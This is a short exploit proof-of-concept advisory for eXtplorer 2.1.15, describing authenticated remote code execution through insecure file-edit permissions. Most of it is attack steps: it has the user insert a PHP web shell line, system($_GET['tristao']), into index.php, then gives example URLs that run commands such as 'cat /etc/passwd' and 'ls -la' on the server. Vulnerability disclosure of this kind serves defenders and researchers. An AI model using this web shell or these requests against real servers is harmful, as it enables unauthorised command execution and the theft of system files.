Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated) Date: 2022-11-09 Author: Francisco Marinho Vendor Homepage: http://extplorer.net/ Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip Version: 2.1.15 Tested on: Linux ==========> POC <==========

1- Login with your account 2- Access the directory /index.php 3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two. 4- Acess homepage index.php Examples: cat /etc/passwd /index.php?tristao=cat%20%20/etc/passwd cat ls -la /index.php?tristao=ls%20-la